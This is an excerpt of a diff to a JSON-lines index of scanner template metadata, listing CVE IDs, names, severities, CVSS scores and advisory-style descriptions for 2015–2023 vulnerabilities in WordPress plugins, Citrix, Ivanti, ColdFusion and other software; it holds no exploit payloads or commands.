{"ID":"CVE-2015-1579","Info":{"Name":"WordPress Slider Revolution - Local File Disclosure","Severity":"medium","Description":"Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.\n","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-1579.yaml"}
{"ID":"CVE-2015-1635","Info":{"Name":"Microsoft Windows 'HTTP.sys' - Remote Code Execution","Severity":"critical","Description":"HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka \"HTTP.sys Remote Code Execution Vulnerability.\"\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2015/CVE-2015-1635.yaml"}
{"ID":"CVE-2015-1880","Info":{"Name":"Fortinet FortiOS \u003c=5.2.3 - Cross-Site Scripting","Severity":"medium","Description":"Fortinet FortiOS 5.2.x before 5.2.3 contains a cross-site scripting vulnerability in the SSL VPN login page which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-1880.yaml"}
{"ID":"CVE-2015-20067","Info":{"Name":"WP Attachment Export \u003c 0.2.4 - Unrestricted File Download","Severity":"high","Description":"The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a Wordpress\npowered site. This includes details of even privately published posts and password protected posts with their passwords revealed in plain text.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-20067.yaml"}
{"ID":"CVE-2015-2067","Info":{"Name":"Magento Server MAGMI - Directory Traversal","Severity":"medium","Description":"Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-2067.yaml"}
@ -1151,6 +1152,7 @@
{"ID":"CVE-2021-24409","Info":{"Name":"Prismatic \u003c 2.8 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not escape the 'tab' GET parameter before outputting it back in an attribute, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in administrator\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24409.yaml"}
{"ID":"CVE-2021-24435","Info":{"Name":"WordPress Titan Framework plugin \u003c= 1.12.1 - Cross-Site Scripting","Severity":"medium","Description":"The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24435.yaml"}
{"ID":"CVE-2021-24436","Info":{"Name":"WordPress W3 Total Cache \u003c2.1.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress W3 Total Cache plugin before 2.1.4 is susceptible to cross-site scripting within the extension parameter in the Extensions dashboard, which is output in an attribute without being escaped first. This can allow an attacker to convince an authenticated admin into clicking a link to run malicious JavaScript within the user's web browser, which could lead to full site compromise.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24436.yaml"}
{"ID":"CVE-2021-24442","Info":{"Name":"Wordpress Polls Widget \u003c 1.5.3 - SQL Injection","Severity":"critical","Description":"The Poll, Survey, Questionnaire and Voting system WordPress plugin before 1.5.3 did not sanitise, escape or validate the date_answers[] POST parameter before using it in a SQL statement when sending a Poll result, allowing unauthenticated users to perform SQL Injection attacks\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24442.yaml"}
{"ID":"CVE-2021-24452","Info":{"Name":"WordPress W3 Total Cache \u003c2.1.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress W3 Total Cache plugin before 2.1.5 is susceptible to cross-site scripting via the extension parameter in the Extensions dashboard, when the setting 'Anonymously track usage to improve product quality' is enabled. The parameter is output in a JavaScript context without proper escaping. This can allow an attacker, who can convince an authenticated admin into clicking a link, to run malicious JavaScript within the user's web browser, which could lead to full site compromise.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24452.yaml"}
{"ID":"CVE-2021-24472","Info":{"Name":"Onair2 \u003c 3.9.9.2 \u0026 KenthaRadio \u003c 2.0.2 - Remote File Inclusion/Server-Side Request Forgery","Severity":"critical","Description":"Onair2 \u003c 3.9.9.2 and KenthaRadio \u003c 2.0.2 have exposed proxy functionality to unauthenticated users. Sending requests to this proxy functionality will have the web server fetch and display the content from any URI, allowing remote file inclusion and server-side request forgery.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24472.yaml"}
{"ID":"CVE-2021-24488","Info":{"Name":"WordPress Post Grid \u003c2.1.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Post Grid plugin before 2.1.8 contains a reflected cross-site scripting vulnerability. The slider import search feature and tab parameter of thesettings are not properly sanitized before being output back in the pages,","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24488.yaml"}
@ -1165,10 +1167,11 @@
{"ID":"CVE-2021-24731","Info":{"Name":"Pie Register \u003c 3.7.1.6 - SQL Injection","Severity":"critical","Description":"The Registration Forms User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.7.1.6 does not properly escape user data before using it in a SQL statement in the wp-json/pie/v1/login REST API endpoint, leading to an SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24731.yaml"}
{"ID":"CVE-2021-24746","Info":{"Name":"WordPress Sassy Social Share Plugin \u003c3.3.40 - Cross-Site Scripting","Severity":"medium","Description":"WordPress plugin Sassy Social Share \u003c 3.3.40 contains a reflected cross-site scripting vulnerability.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24746.yaml"}
{"ID":"CVE-2021-24750","Info":{"Name":"WordPress Visitor Statistics (Real Time Traffic) \u003c4.8 -SQL Injection","Severity":"high","Description":"WordPress Visitor Statistics (Real Time Traffic) plugin before 4.8 does not properly sanitize and escape the refUrl in the refDetails AJAX action, which is available to any authenticated user. This could allow users with a role as low as subscriber to perform SQL injection attacks.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2021/CVE-2021-24750.yaml"}
{"ID":"CVE-2021-24762","Info":{"Name":"WordPress Perfect Survey\u003c1.5.2 - SQL Injection","Severity":"critical","Description":"Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24762.yaml"}
{"ID":"CVE-2021-24762","Info":{"Name":"WordPress Perfect Survey \u003c1.5.2 - SQL Injection","Severity":"critical","Description":"Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24762.yaml"}
{"ID":"CVE-2021-24791","Info":{"Name":"Header Footer Code Manager \u003c 1.1.14 - Admin+ SQL Injection","Severity":"high","Description":"The Header Footer Code Manager WordPress plugin before 1.1.14 does not validate and escape the \"orderby\" and \"order\" request parameters before using them in a SQL statement when viewing the Snippets admin dashboard, leading to SQL injections\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2021/CVE-2021-24791.yaml"}
{"ID":"CVE-2021-24827","Info":{"Name":"WordPress Asgaros Forum \u003c1.15.13 - SQL Injection","Severity":"critical","Description":"WordPress Asgaros Forum plugin before 1.15.13 is susceptible to SQL injection. The plugin does not validate and escape user input when subscribing to a topic before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24827.yaml"}
{"ID":"CVE-2021-24838","Info":{"Name":"WordPress AnyComment \u003c0.3.5 - Open Redirect","Severity":"medium","Description":"WordPress AnyComment plugin before 0.3.5 contains an open redirect vulnerability via an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24838.yaml"}
{"ID":"CVE-2021-24849","Info":{"Name":"WCFM WooCommerce Multivendor Marketplace \u003c 3.4.12 - SQL Injection","Severity":"critical","Description":"The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24849.yaml"}
{"ID":"CVE-2021-24862","Info":{"Name":"WordPress RegistrationMagic \u003c5.0.1.6 - Authenticated SQL Injection","Severity":"high","Description":"WordPress RegistrationMagic plugin before 5.0.1.6 contains an authenticated SQL injection vulnerability. The plugin does not escape user input in its rm_chronos_ajax AJAX action before using it in a SQL statement when duplicating tasks in batches. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. This is a potential issue in both WordPress and WordPress Administrator.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2021/CVE-2021-24862.yaml"}
{"ID":"CVE-2021-24875","Info":{"Name":"WordPress eCommerce Product Catalog \u003c3.0.39 - Cross-Site Scripting","Severity":"medium","Description":"WordPress eCommerce Product Catalog plugin before 3.0.39 contains a cross-site scripting vulnerability. The plugin does not escape the ic-settings-search parameter before outputting it back in the page in an attribute. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24875.yaml"}
{"ID":"CVE-2021-24891","Info":{"Name":"WordPress Elementor Website Builder \u003c3.1.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Elementor Website Builder plugin before 3.1.4 contains a DOM cross-site scripting vulnerability. It does not sanitize or escape user input appended to the DOM via a malicious hash.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24891.yaml"}
@ -1178,6 +1181,7 @@
{"ID":"CVE-2021-24926","Info":{"Name":"WordPress Domain Check \u003c1.0.17 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Domain Check plugin before 1.0.17 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the domain parameter before outputting it back in the page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24926.yaml"}
{"ID":"CVE-2021-24931","Info":{"Name":"WordPress Secure Copy Content Protection and Content Locking \u003c2.8.2 - SQL Injection","Severity":"critical","Description":"WordPress Secure Copy Content Protection and Content Locking plugin before 2.8.2 contains a SQL injection vulnerability. The plugin does not escape the sccp_id parameter of the ays_sccp_results_export_file AJAX action, available to both unauthenticated and authenticated users, before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24931.yaml"}
{"ID":"CVE-2021-24940","Info":{"Name":"WordPress Persian Woocommerce \u003c=5.8.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Persian Woocommerce plugin through 5.8.0 contains a cross-site scripting vulnerability. The plugin does not escape the s parameter before outputting it back in an attribute in the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and possibly steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24940.yaml"}
{"ID":"CVE-2021-24943","Info":{"Name":"Registrations for the Events Calendar \u003c 2.7.6 - SQL Injection","Severity":"critical","Description":"The Registrations for the Events Calendar WordPress plugin before 2.7.6 does not sanitise and escape the event_id in the rtec_send_unregister_link AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an unauthenticated SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24943.yaml"}
{"ID":"CVE-2021-24946","Info":{"Name":"WordPress Modern Events Calendar \u003c6.1.5 - Blind SQL Injection","Severity":"critical","Description":"WordPress Modern Events Calendar plugin before 6.1.5 is susceptible to blind SQL injection. The plugin does not sanitize and escape the time parameter before using it in a SQL statement in the mec_load_single_page AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24946.yaml"}
{"ID":"CVE-2021-24947","Info":{"Name":"WordPress Responsive Vector Maps \u003c 6.4.2 - Arbitrary File Read","Severity":"medium","Description":"WordPress Responsive Vector Maps \u003c 6.4.2 contains an arbitrary file read vulnerability because the plugin does not have proper authorization and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user to read arbitrary files on the web server.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-24947.yaml"}
{"ID":"CVE-2021-24956","Info":{"Name":"Blog2Social \u003c 6.8.7 - Cross-Site Scripting","Severity":"medium","Description":"The Blog2Social: Social Media Auto Post \u0026 Scheduler WordPress plugin before 6.8.7 does not sanitise and escape the b2sShowByDate parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24956.yaml"}
@ -2167,6 +2171,7 @@
{"ID":"CVE-2023-37728","Info":{"Name":"IceWarp Webmail Server v10.2.1 - Cross Site Scripting","Severity":"medium","Description":"Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37728.yaml"}
{"ID":"CVE-2023-37979","Info":{"Name":"Ninja Forms \u003c 3.6.26 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37979.yaml"}
{"ID":"CVE-2023-38035","Info":{"Name":"Ivanti Sentry - Authentication Bypass","Severity":"critical","Description":"A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38035.yaml"}
{"ID":"CVE-2023-38203","Info":{"Name":"Adobe ColdFusion Deserialization of Untrusted Data","Severity":"critical","Description":"Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38203.yaml"}
{"ID":"CVE-2023-38205","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38205.yaml"}
{"ID":"CVE-2023-3836","Info":{"Name":"Dahua Smart Park Management - Arbitrary File Upload","Severity":"critical","Description":"Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3836.yaml"}
{"ID":"CVE-2023-3843","Info":{"Name":"mooDating 1.2 - Cross-site scripting","Severity":"medium","Description":"A vulnerability was found in mooSocial mooDating 1.2. It has been classified as problematic. Affected is an unknown function of the file /matchmakings/question of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. VDB-235194 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3843.yaml"}
@ -2196,6 +2201,7 @@
{"ID":"CVE-2023-39700","Info":{"Name":"IceWarp Mail Server v10.4.5 - Cross-Site Scripting","Severity":"medium","Description":"IceWarp Mail Server v10.4.5 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39700.yaml"}
{"ID":"CVE-2023-39796","Info":{"Name":"WBCE 1.6.0 - SQL Injection","Severity":"critical","Description":"There is an sql injection vulnerability in \"miniform module\" which is a default module installed in the WBCE cms. It is an unauthenticated sqli so anyone could access it and takeover the whole database. In file \"/modules/miniform/ajax_delete_message.php\" there is no authentication check. On line 40 in this file, there is a DELETE query that is vulnerable, an attacker could jump from the query using the tick sign - `.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39796.yaml"}
{"ID":"CVE-2023-40208","Info":{"Name":"Stock Ticker \u003c= 3.23.2 - Cross-Site Scripting","Severity":"medium","Description":"The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_load function in versions up to, and including, 3.23.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40208.yaml"}
{"ID":"CVE-2023-40355","Info":{"Name":"Axigen WebMail - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting (XSS) vulnerability in Axigen versions 10.3.3.0 before 10.3.3.59, 10.4.0 before 10.4.19, and 10.5.0 before 10.5.5, allows authenticated attackers to execute arbitrary code and obtain sensitive information via the logic for switching between the Standard and Ajax versions.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-40355.yaml"}
{"ID":"CVE-2023-40779","Info":{"Name":"IceWarp Mail Server Deep Castle 2 v.13.0.1.2 - Open Redirect","Severity":"medium","Description":"An issue in IceWarp Mail Server Deep Castle 2 v.13.0.1.2 allows a remote attacker to execute arbitrary code via a crafted request to the URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40779.yaml"}
{"ID":"CVE-2023-4110","Info":{"Name":"PHPJabbers Availability Booking Calendar 5.0 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability has been found in PHP Jabbers Availability Booking Calendar 5.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument session_id leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4110.yaml"}
{"ID":"CVE-2023-41109","Info":{"Name":"SmartNode SN200 Analog Telephone Adapter (ATA) \u0026 VoIP Gateway - Command Injection","Severity":"critical","Description":"The SmartNode SN200 Analog Telephone Adapter (ATA) \u0026 VoIP Gateway is vulnerable to command injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-41109.yaml"}
@ -2217,6 +2223,7 @@
{"ID":"CVE-2023-41763","Info":{"Name":"Skype for Business 2019 (SfB) - Blind Server-side Request Forgery","Severity":"medium","Description":"Skype Pre-Auth Server-side Request Forgery (SSRF) vulnerability\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-41763.yaml"}
{"ID":"CVE-2023-41892","Info":{"Name":"CraftCMS \u003c 4.4.15 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector leading to Remote Code Execution (RCE). Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-41892.yaml"}
{"ID":"CVE-2023-42343","Info":{"Name":"OpenCMS - Cross-Site Scripting","Severity":"medium","Description":"OpenCMS below 10.5.1 is vulnerable to Cross-Site Scripting vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-42343.yaml"}
{"ID":"CVE-2023-42344","Info":{"Name":"OpenCMS - XML external entity (XXE)","Severity":"high","Description":"users can execute code without authentication. An attacker can execute malicious requests on the OpenCms server. When the requests are successful vulnerable OpenCms can be exploited resulting in an unauthenticated XXE vulnerability. Based on research OpenCMS versions from 9.0.0 to 10.5.0 are vulnerable.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-42344.yaml"}
{"ID":"CVE-2023-42442","Info":{"Name":"JumpServer \u003e 3.6.4 - Information Disclosure","Severity":"medium","Description":"JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can download without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The api `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes set to `[RBACPermission | IsSessionAssignee]`, relation is or, so any permission matched will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the api `$HOST/api/v1/terminal/sessions/?limit=1`. The expected http response code is 401 (`not_authenticated`).\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-42442.yaml"}
{"ID":"CVE-2023-42793","Info":{"Name":"JetBrains TeamCity \u003c 2023.05.4 - Remote Code Execution","Severity":"critical","Description":"In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-42793.yaml"}
{"ID":"CVE-2023-43177","Info":{"Name":"CrushFTP \u003c 10.5.1 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43177.yaml"}
@ -2230,6 +2237,7 @@
{"ID":"CVE-2023-4451","Info":{"Name":"Cockpit - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository cockpit-hq/cockpit prior to 2.6.4.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4451.yaml"}
{"ID":"CVE-2023-4547","Info":{"Name":"SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4547.yaml"}
{"ID":"CVE-2023-45542","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the q parameter on search function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-45542.yaml"}
{"ID":"CVE-2023-45671","Info":{"Name":"Frigate \u003c 0.13.0 Beta 3 - Cross-Site Scripting","Severity":"medium","Description":"Frigate is an open source network video recorder. Before version 0.13.0 Beta 3, there is a reflected cross-site scripting vulnerability in any API endpoints reliant on the `/\u003ccamera_name\u003e` base path as values provided for the path are not sanitized. Exploiting this vulnerability requires the attacker to both know very specific information about a user's Frigate server and requires an authenticated user to be tricked into clicking a specially crafted link to their Frigate instance. This vulnerability could exploited by an attacker under the following circumstances: Frigate publicly exposed to the internet (even with authentication); attacker knows the address of a user's Frigate instance; attacker crafts a specialized page which links to the user's Frigate instance; attacker finds a way to get an authenticated user to visit their specialized page and click the button/link. As the reflected values included in the URL are not sanitized or escaped, this permits execution arbitrary Javascript payloads. Version 0.13.0 Beta 3 contains a patch for this issue.\n","Classification":{"CVSSScore":"4.7"}},"file_path":"http/cves/2023/CVE-2023-45671.yaml"}
{"ID":"CVE-2023-4568","Info":{"Name":"PaperCut NG Unauthenticated XMLRPC Functionality","Severity":"medium","Description":"PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-4568.yaml"}
{"ID":"CVE-2023-45852","Info":{"Name":"Viessmann Vitogate 300 - Remote Code Execution","Severity":"critical","Description":"In Vitogate 300 2.1.3.0, /cgi-bin/vitogate.cgi allows an unauthenticated attacker to bypass authentication and execute arbitrary commands via shell metacharacters in the ipaddr params JSON data for the put method.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-45852.yaml"}
{"ID":"CVE-2023-4596","Info":{"Name":"WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload","Severity":"critical","Description":"The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4596.yaml"}
@ -2244,6 +2252,7 @@
{"ID":"CVE-2023-47246","Info":{"Name":"SysAid Server - Remote Code Execution","Severity":"critical","Description":"In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-47246.yaml"}
{"ID":"CVE-2023-47643","Info":{"Name":"SuiteCRM Unauthenticated Graphql Introspection","Severity":"medium","Description":"Graphql Introspection is enabled without authentication, exposing the scheme defining all object types, arguments, and functions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-47643.yaml"}
{"ID":"CVE-2023-48023","Info":{"Name":"Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery","Severity":"high","Description":"The Ray Dashboard API is affected by a Server-Side Request Forgery (SSRF) vulnerability in the url parameter of the /log_proxy API endpoint. The API does not perform sufficient input validation within the affected parameter and any HTTP or HTTPS URLs are accepted as valid.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-48023.yaml"}
{"ID":"CVE-2023-48777","Info":{"Name":"WordPress Elementor 3.18.1 - File Upload/Remote Code Execution","Severity":"critical","Description":"The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-48777.yaml"}
{"ID":"CVE-2023-49070","Info":{"Name":"Apache OFBiz \u003c 18.12.10 - Arbitrary Code Execution","Severity":"critical","Description":"Pre-auth RCE in Apache Ofbiz 18.12.09. It's due to XML-RPC no longer maintained still present. This issue affects Apache OFBiz: before 18.12.10.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-49070.yaml"}
{"ID":"CVE-2023-49103","Info":{"Name":"OwnCloud - Phpinfo Configuration","Severity":"high","Description":"An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-49103.yaml"}
{"ID":"CVE-2023-4966","Info":{"Name":"Citrix Bleed - Leaking Session Tokens","Severity":"high","Description":"Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA ?virtual?server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4966.yaml"}
@ -2270,18 +2279,34 @@
{"ID":"CVE-2023-6553","Info":{"Name":"Worpress Backup Migration \u003c= 1.3.7 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated threat actors to easily execute code on the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6553.yaml"}
